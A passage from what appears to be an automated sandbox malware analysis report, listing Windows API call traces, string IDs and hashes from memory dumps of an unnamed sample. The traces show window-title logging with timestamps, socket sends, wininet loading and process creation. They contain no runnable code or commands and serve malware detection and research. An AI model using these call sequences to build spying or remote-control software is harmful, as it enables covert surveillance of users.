                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CriticalErrorLastSection$EnterLeave
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2124651672-0
                                                                                                                                                                      • Opcode ID: 8d737cad8e08bdfcbeaf6e5747714396cc624bd3427fd9ac9b3386a171bbcafd
                                                                                                                                                                      • Instruction ID: f01188dba5deba59980a3ebb3b27b01bc64bbef42725079179d567fa40463c56
                                                                                                                                                                      • Opcode Fuzzy Hash: 8d737cad8e08bdfcbeaf6e5747714396cc624bd3427fd9ac9b3386a171bbcafd
                                                                                                                                                                      • Instruction Fuzzy Hash: 2551AE76E04601DFC324DFA8D989B6AF7F5FF88711F104A2AE90A87740D735A4148B91
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4158929233.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_35f0000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memset$_wcsrchr
                                                                                                                                                                      • String ID: D
                                                                                                                                                                      • API String ID: 170005318-2746444292
                                                                                                                                                                      • Opcode ID: dbe0af0cfe405bfaa2f7670afa9565592a0c6507b5e6e8f9ef5526909d63a184
                                                                                                                                                                      • Instruction ID: fbcb9cf6111574d092459bd5e0057a7120408d209a0f336a8da3981c857e404b
                                                                                                                                                                      • Opcode Fuzzy Hash: dbe0af0cfe405bfaa2f7670afa9565592a0c6507b5e6e8f9ef5526909d63a184
                                                                                                                                                                      • Instruction Fuzzy Hash: 3651087194031DBEDB24EBA0DC85FEA7778EF54700F4005D9A709AA090EB709A54CF66
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 0377E751
                                                                                                                                                                      • GetForegroundWindow.USER32(?,74DF23A0,00000000), ref: 0377E759
                                                                                                                                                                      • GetWindowTextW.USER32(00000000,037A16F0,00000800), ref: 0377E76F
                                                                                                                                                                      • _memset.LIBCMT ref: 0377E78D
                                                                                                                                                                      • lstrlenW.KERNEL32(037A16F0,?,?,?,?,74DF23A0,00000000), ref: 0377E7AC
                                                                                                                                                                      • GetLocalTime.KERNEL32(?,?,?,?,?,74DF23A0,00000000), ref: 0377E7BD
                                                                                                                                                                      • wsprintfW.USER32 ref: 0377E804
                                                                                                                                                                        • Part of subcall function 0377E6B0: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,?,?,0377E815,?,?,?,?,74DF23A0,00000000), ref: 0377E6BD
                                                                                                                                                                        • Part of subcall function 0377E6B0: CreateFileW.KERNEL32(037A0D80,40000000,00000002,00000000,00000004,00000002,00000000,?,?,0377E815,?,?,?,?,74DF23A0,00000000), ref: 0377E6D7
                                                                                                                                                                        • Part of subcall function 0377E6B0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0377E6F2
                                                                                                                                                                        • Part of subcall function 0377E6B0: lstrlenW.KERNEL32(?,00000000,00000000), ref: 0377E6FF
                                                                                                                                                                        • Part of subcall function 0377E6B0: WriteFile.KERNEL32(00000000,?,00000000), ref: 0377E70A
                                                                                                                                                                        • Part of subcall function 0377E6B0: CloseHandle.KERNEL32(00000000), ref: 0377E711
                                                                                                                                                                        • Part of subcall function 0377E6B0: ReleaseMutex.KERNEL32(00000000), ref: 0377E71E
                                                                                                                                                                      • _memset.LIBCMT ref: 0377E820
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File_memset$Windowlstrlen$CloseCreateForegroundHandleLocalMutexObjectPointerReleaseSingleTextTimeWaitWritewsprintf
                                                                                                                                                                      • String ID: [
                                                                                                                                                                      • API String ID: 2192163267-4056885943
                                                                                                                                                                      • Opcode ID: fa69f451f183e21d93fdf46a2b6f3b60779889de8bdd64fe3c8f8eff74c6c750
                                                                                                                                                                      • Instruction ID: 76b15f3ef830ebe5d6e7003f1b39d7173710c577057d4eb8312d232b63c6ae50
                                                                                                                                                                      • Opcode Fuzzy Hash: fa69f451f183e21d93fdf46a2b6f3b60779889de8bdd64fe3c8f8eff74c6c750
                                                                                                                                                                      • Instruction Fuzzy Hash: 2E21D3B5A40228BAE760EF549C05BBA73BCFB44700F44C29AF54496181DE785985CBE4
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154101487.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2bd0000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memset
                                                                                                                                                                      • String ID: !jWW$.$_$i$l${vU_
                                                                                                                                                                      • API String ID: 2102423945-3065862289
                                                                                                                                                                      • Opcode ID: 2b6eedebc133e2266d96017898138cdc43810d24d5c9c443b0251b8ba9ddad3f
                                                                                                                                                                      • Instruction ID: de59d0199cb92981aa6dd497b75b09911fe004883ca56642414be7140e791e23
                                                                                                                                                                      • Opcode Fuzzy Hash: 2b6eedebc133e2266d96017898138cdc43810d24d5c9c443b0251b8ba9ddad3f
                                                                                                                                                                      • Instruction Fuzzy Hash: 38216D74A413589FD720DF54DC80FAABBB5FF85700F0481CAE54C9A641E7B19A84CF52
                                                                                                                                                                      APIs
                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,0377398D,?,00000000,000000FF,00000000), ref: 03773E05
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,0377398D,?,00000000,000000FF,00000000), ref: 03773E50
                                                                                                                                                                      • send.WS2_32(?,000000FF,00000000,00000000), ref: 03773E6E
                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 03773E81
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 03773E94
                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,?,?,?,0377398D,?,00000000,000000FF,00000000), ref: 03773EBC
                                                                                                                                                                      • WSAGetLastError.WS2_32(?,?,0377398D,?,00000000,000000FF,00000000), ref: 03773EC7
                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,0377398D,?,00000000,000000FF,00000000), ref: 03773EDB
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 03773F14
                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,?), ref: 03773F51
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CriticalSection$EnterLeave$FreeHeap$ErrorLastsend
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1701177279-0
                                                                                                                                                                      • Opcode ID: bd9f497e35fdb08f243ab884ddc11d723b95def739f9a8ccdb67c636ff8675d4
                                                                                                                                                                      • Instruction ID: f8c1b8552be6f9cffef6f30cc4c9149bb894472849f9d767df362cb87c0a6a05
                                                                                                                                                                      • Opcode Fuzzy Hash: bd9f497e35fdb08f243ab884ddc11d723b95def739f9a8ccdb67c636ff8675d4
                                                                                                                                                                      • Instruction Fuzzy Hash: B44149751047059FDB24EF78D8C8AA7B7F8FB08300F44896EE86ECB245D775A4029B90
                                                                                                                                                                      APIs
                                                                                                                                                                      • WSASetLastError.WS2_32(0000000D,00000000,000000FF,00000000,000000FF,00000000), ref: 03774F63
                                                                                                                                                                      • EnterCriticalSection.KERNEL32(000002FF,00000000,000000FF,00000000,000000FF,00000000), ref: 03774F78
                                                                                                                                                                      • WSASetLastError.WS2_32(00002746), ref: 03774F8A
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(000002FF), ref: 03774F91
                                                                                                                                                                      • timeGetTime.WINMM ref: 03774FBF
                                                                                                                                                                      • timeGetTime.WINMM ref: 03774FE7
                                                                                                                                                                      • SetEvent.KERNEL32(?), ref: 03775025
                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,00000001), ref: 03775031
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(000002FF), ref: 03775038
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(000002FF), ref: 0377504B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CriticalSection$Leave$ErrorLastTimetime$EnterEventExchangeInterlocked
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1979691958-0
                                                                                                                                                                      • Opcode ID: f43bc1a0b5852291077e9628a0c106984f65d28b52f05a7a9260e758de90d656
                                                                                                                                                                      • Instruction ID: b698c98cd980d183bdd15ddf7659a98c72bfab5cbb37a1a7e4d395ff340de49b
                                                                                                                                                                      • Opcode Fuzzy Hash: f43bc1a0b5852291077e9628a0c106984f65d28b52f05a7a9260e758de90d656
                                                                                                                                                                      • Instruction Fuzzy Hash: 50410631600708EFDF20EF39D548A6AB7E9FB49314F0C8A9AE44ACB641E735E456CB41
                                                                                                                                                                      APIs
                                                                                                                                                                      • WSASetLastError.WS2_32(0000000D,00000000,000000FF,00000000,000000FF,00000000), ref: 02C64F43
                                                                                                                                                                      • EnterCriticalSection.KERNEL32(000002FF,00000000,000000FF,00000000,000000FF,00000000), ref: 02C64F58
                                                                                                                                                                      • WSASetLastError.WS2_32(00002746), ref: 02C64F6A
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(000002FF), ref: 02C64F71
                                                                                                                                                                      • timeGetTime.WINMM ref: 02C64F9F
                                                                                                                                                                      • timeGetTime.WINMM ref: 02C64FC7
                                                                                                                                                                      • SetEvent.KERNEL32(?), ref: 02C65005
                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,00000001), ref: 02C65011
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(000002FF), ref: 02C65018
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(000002FF), ref: 02C6502B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CriticalSection$Leave$ErrorLastTimetime$EnterEventExchangeInterlocked
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1979691958-0
                                                                                                                                                                      • Opcode ID: 54df8fb2742aedd45c02bbc7320fe32c82dfb850ce4f800534d9ff3994d2affd
                                                                                                                                                                      • Instruction ID: a73b17a46a8bdba3e65e8de7151ca8f364e310473726ba5ccbb25923172c24e5
                                                                                                                                                                      • Opcode Fuzzy Hash: 54df8fb2742aedd45c02bbc7320fe32c82dfb850ce4f800534d9ff3994d2affd
                                                                                                                                                                      • Instruction Fuzzy Hash: 8941D531A002009FD730DF69D98CB7AB7E6FF88354F508A59E84ACB241E776E5548B82
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 0377C2AE
                                                                                                                                                                      • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 0377C2CC
                                                                                                                                                                      • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0377C309
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0377C314
                                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 0377C321
                                                                                                                                                                      • wsprintfW.USER32 ref: 0377C345
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$CloseCreateHandleWrite_memsetlstrlenwsprintf
                                                                                                                                                                      • String ID: %s %s
                                                                                                                                                                      • API String ID: 1326869720-2939940506
                                                                                                                                                                      • Opcode ID: 1edfad6cb6980bb812b8415ce50bb1781718b5f0181fc6d386fcf7add2012a74
                                                                                                                                                                      • Instruction ID: 30924a013cc7d14aaf2ecf0bd1f5d05496311e2d5aad27974619caee818e8242
                                                                                                                                                                      • Opcode Fuzzy Hash: 1edfad6cb6980bb812b8415ce50bb1781718b5f0181fc6d386fcf7add2012a74
                                                                                                                                                                      • Instruction Fuzzy Hash: F731D53264021C7BDF24EB64DC85FEF737CEB09311F40469AF605AA181DA345A44CFA1
                                                                                                                                                                      APIs
                                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 0377C98D
                                                                                                                                                                      • _wcsrchr.LIBCMT ref: 0377C9C7
                                                                                                                                                                        • Part of subcall function 03777C80: LoadLibraryW.KERNEL32(wininet.dll), ref: 03777CC3
                                                                                                                                                                        • Part of subcall function 03777C80: GetProcAddress.KERNEL32(00000000,InternetOpenW), ref: 03777CD7
                                                                                                                                                                        • Part of subcall function 03777C80: FreeLibrary.KERNEL32(00000000), ref: 03777CF7
                                                                                                                                                                      • GetFileAttributesW.KERNEL32(-00000002), ref: 0377C9E6
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0377C9F1
                                                                                                                                                                      • _memset.LIBCMT ref: 0377CA04
                                                                                                                                                                      • CreateProcessW.KERNEL32(00000000,-00000002,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0377CA31
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Library$AddressAttributesCreateErrorFileFreeLastLoadProcProcess_memset_wcsrchrlstrlen
                                                                                                                                                                      • String ID: D$WinSta0\Default
                                                                                                                                                                      • API String ID: 174883095-1101385590
                                                                                                                                                                      • Opcode ID: 1f3e062cc4cc0a622145dc52eb2178ba836171cb8b53690e603e7fd45e8592c8
                                                                                                                                                                      • Instruction ID: e0c61b41fd1859f246912474d7d47f200d126b95a76a3295b563c33af5848ed7
                                                                                                                                                                      • Opcode Fuzzy Hash: 1f3e062cc4cc0a622145dc52eb2178ba836171cb8b53690e603e7fd45e8592c8
                                                                                                                                                                      • Instruction Fuzzy Hash: 16112EB7A0020837DB25F7A85C89FBFB76CDB55610F044136FA059D284E6359505C2E1
                                                                                                                                                                      APIs
                                                                                                                                                                      • lstrcmpiW.KERNEL32(?,A:\), ref: 03778166
                                                                                                                                                                      • lstrcmpiW.KERNEL32(?,B:\), ref: 03778176
                                                                                                                                                                      • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 037781A6
                                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 037781B7
                                                                                                                                                                      • __wcsnicmp.LIBCMT ref: 037781CE
                                                                                                                                                                      • lstrcpyW.KERNEL32(00000AD4,?), ref: 03778204
                                                                                                                                                                      • lstrcpyW.KERNEL32(?,?), ref: 03778228
                                                                                                                                                                      • lstrcatW.KERNEL32(?,00000000), ref: 03778233
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: lstrcmpilstrcpy$DeviceQuery__wcsnicmplstrcatlstrlen
                                                                                                                                                                      • String ID: A:\$B:\
                                                                                                                                                                      • API String ID: 4249875308-1009255891
                                                                                                                                                                      • Opcode ID: a4d3b7addff0e21be439a98b1e51a88fa4d0aea0ebeb8161d0571d5bd86ebbff
                                                                                                                                                                      • Instruction ID: c6c9794a368870fa172906081167c8d72a6aaea9c8a0c1c1509692345034b25e
                                                                                                                                                                      • Opcode Fuzzy Hash: a4d3b7addff0e21be439a98b1e51a88fa4d0aea0ebeb8161d0571d5bd86ebbff
                                                                                                                                                                      • Instruction Fuzzy Hash: E7118171A01218EBDF20EF60DD497EEB378EF44310F044599DE09A7240E774DA06CBA5
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,A0516FA3,00000000,?,?,?,00000000,0379125B,000000FF,?,0377E04E,00000000), ref: 03779773
                                                                                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(0377E1AE,00000000,?,?,?,00000000,0379125B,000000FF,?,0377E04E), ref: 03779812
                                                                                                                                                                      • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,0379125B,000000FF,?,0377E04E), ref: 03779850
                                                                                                                                                                      • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,0379125B,000000FF,?,0377E04E), ref: 03779875
                                                                                                                                                                      • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,0379125B,000000FF,?,0377E04E), ref: 0377989A
                                                                                                                                                                        • Part of subcall function 03771280: __CxxThrowException@8.LIBCMT ref: 03771290
                                                                                                                                                                        • Part of subcall function 03771280: DeleteCriticalSection.KERNEL32(00000000,0377D3E6,03796624,?,?,0377D3E6,?,?,?,?,03795A40,00000000), ref: 037712A1
                                                                                                                                                                        • Part of subcall function 0377CE10: InitializeCriticalSectionAndSpinCount.KERNEL32(0377E076,00000000,A0516FA3,0377E04E,74DF2F60,00000000,?,0377E226,0379110B,000000FF,?,0377994A,0377E226), ref: 0377CE67
                                                                                                                                                                        • Part of subcall function 0377CE10: InitializeCriticalSectionAndSpinCount.KERNEL32(0377E08E,00000000,?,0377E226,0379110B,000000FF,?,0377994A,0377E226,?,?,?,00000000,0379125B,000000FF), ref: 0377CE83
                                                                                                                                                                      • InterlockedExchange.KERNEL32(0377E066,00000000), ref: 037799A0
                                                                                                                                                                      • timeGetTime.WINMM(?,?,?,00000000,0379125B,000000FF,?,0377E04E), ref: 037799A6
                                                                                                                                                                      • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,00000000,0379125B,000000FF,?,0377E04E), ref: 037799B4
                                                                                                                                                                      • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,0379125B,000000FF,?,0377E04E), ref: 037799BD
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateEvent$CriticalSection$CountInitializeSpin$DeleteException@8ExchangeInterlockedThrowTimetime
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1400036169-0
                                                                                                                                                                      • Opcode ID: b513480101fa7e88a4a2ad05c6f9f13d91acab1c86e955512cf6aa3d250616d9
                                                                                                                                                                      • Instruction ID: ad0b3068c210039a0a8096a6b0716244767e46fe84bc5a53ffd749e749fa74f2
                                                                                                                                                                      • Opcode Fuzzy Hash: b513480101fa7e88a4a2ad05c6f9f13d91acab1c86e955512cf6aa3d250616d9
                                                                                                                                                                      • Instruction Fuzzy Hash: FD81C5B0A01A46BFE744DF7AC88479AFBA8FB09314F50862ED12CD7640D775A964CF90
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 03773660: CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 03773667
                                                                                                                                                                        • Part of subcall function 03773660: _free.LIBCMT ref: 0377369C
                                                                                                                                                                        • Part of subcall function 03773660: _malloc.LIBCMT ref: 037736D7
                                                                                                                                                                        • Part of subcall function 03773660: _memset.LIBCMT ref: 037736E5
                                                                                                                                                                      • InterlockedIncrement.KERNEL32(037A1F0C), ref: 03773565
                                                                                                                                                                      • InterlockedIncrement.KERNEL32(037A1F0C), ref: 03773573
                                                                                                                                                                      • setsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 0377359A
                                                                                                                                                                      • setsockopt.WS2_32(?,0000FFFF,00001002,?,00000004), ref: 037735B3
                                                                                                                                                                      • ResetEvent.KERNEL32(?,?,?,037A1F0C), ref: 037735EE
                                                                                                                                                                      • SetLastError.KERNEL32(00000000), ref: 03773621
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 03773639
                                                                                                                                                                        • Part of subcall function 03773F60: GetCurrentThreadId.KERNEL32 ref: 03773F65
                                                                                                                                                                        • Part of subcall function 03773F60: send.WS2_32(?,037949C0,00000010,00000000), ref: 03773FC6
                                                                                                                                                                        • Part of subcall function 03773F60: SetEvent.KERNEL32(?), ref: 03773FE9
                                                                                                                                                                        • Part of subcall function 03773F60: InterlockedExchange.KERNEL32(?,00000000), ref: 03773FF5
                                                                                                                                                                        • Part of subcall function 03773F60: WSACloseEvent.WS2_32(?), ref: 03774003
                                                                                                                                                                        • Part of subcall function 03773F60: shutdown.WS2_32(?,00000001), ref: 0377401B
                                                                                                                                                                        • Part of subcall function 03773F60: closesocket.WS2_32(?), ref: 03774025
                                                                                                                                                                      • SetLastError.KERNEL32(00000000), ref: 03773649
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorEventInterlockedLast$Incrementsetsockopt$CloseCreateCurrentExchangeResetThreadTimerWaitable_free_malloc_memsetclosesocketsendshutdown
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 127459856-0
                                                                                                                                                                      • Opcode ID: 97cafa48633974060d49b5bdc28e344d0917141cabcaeb8430da46ab5f3aa0d2
                                                                                                                                                                      • Instruction ID: 6dd1bac515bf97f548fd6cc6007228d55fb3d9c579bec284db93e6cebca262c1
                                                                                                                                                                      • Opcode Fuzzy Hash: 97cafa48633974060d49b5bdc28e344d0917141cabcaeb8430da46ab5f3aa0d2
                                                                                                                                                                      • Instruction Fuzzy Hash: 8441A0B9600704AFE760EF79DC81B6AF7E8FB48701F50492EE64AD7680D7B5E4049B90
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 02C63660: CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 02C63667
                                                                                                                                                                        • Part of subcall function 02C63660: _free.LIBCMT ref: 02C6369C
                                                                                                                                                                        • Part of subcall function 02C63660: _malloc.LIBCMT ref: 02C636D7
                                                                                                                                                                        • Part of subcall function 02C63660: _memset.LIBCMT ref: 02C636E5
                                                                                                                                                                      • InterlockedIncrement.KERNEL32(02C7D990), ref: 02C63565
                                                                                                                                                                      • InterlockedIncrement.KERNEL32(02C7D990), ref: 02C63573
                                                                                                                                                                      • setsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 02C6359A
                                                                                                                                                                      • setsockopt.WS2_32(?,0000FFFF,00001002,?,00000004), ref: 02C635B3
                                                                                                                                                                      • ResetEvent.KERNEL32(?,?,?,02C7D990), ref: 02C635EE
                                                                                                                                                                      • SetLastError.KERNEL32(00000000), ref: 02C63621
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 02C63639
                                                                                                                                                                        • Part of subcall function 02C63F60: GetCurrentThreadId.KERNEL32 ref: 02C63F65
                                                                                                                                                                        • Part of subcall function 02C63F60: send.WS2_32(?,02C77440,00000010,00000000), ref: 02C63FC6
                                                                                                                                                                        • Part of subcall function 02C63F60: SetEvent.KERNEL32(?), ref: 02C63FE9
                                                                                                                                                                        • Part of subcall function 02C63F60: InterlockedExchange.KERNEL32(?,00000000), ref: 02C63FF5
                                                                                                                                                                        • Part of subcall function 02C63F60: WSACloseEvent.WS2_32(?), ref: 02C64003
                                                                                                                                                                        • Part of subcall function 02C63F60: shutdown.WS2_32(?,00000001), ref: 02C6401B
                                                                                                                                                                        • Part of subcall function 02C63F60: closesocket.WS2_32(?), ref: 02C64025
                                                                                                                                                                      • SetLastError.KERNEL32(00000000), ref: 02C63649
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorEventInterlockedLast$Incrementsetsockopt$CloseCreateCurrentExchangeResetThreadTimerWaitable_free_malloc_memsetclosesocketsendshutdown
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 127459856-0
                                                                                                                                                                      • Opcode ID: 602a04fa532578dc6978bced49faf2781c71eb5ad812b4d98276df7cafcab284
                                                                                                                                                                      • Instruction ID: 48087ae806f2e2029aa5a3243c884b19516c258f00d9a31bc314ca05eb2de986
                                                                                                                                                                      • Opcode Fuzzy Hash: 602a04fa532578dc6978bced49faf2781c71eb5ad812b4d98276df7cafcab284
                                                                                                                                                                      • Instruction Fuzzy Hash: B241AEB1A40704AFD360EF69DCC5B6AB7E9FF88701F50096EEA46D7680D7B1E5048B90
                                                                                                                                                                      APIs
                                                                                                                                                                      • ResetEvent.KERNEL32(?), ref: 03774443
                                                                                                                                                                      • ResetEvent.KERNEL32(?), ref: 0377444C
                                                                                                                                                                      • timeGetTime.WINMM ref: 0377444E
                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,00000000), ref: 0377445D
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,00001770), ref: 037744AB
                                                                                                                                                                      • ResetEvent.KERNEL32(?), ref: 037744C8
                                                                                                                                                                        • Part of subcall function 03773F60: GetCurrentThreadId.KERNEL32 ref: 03773F65
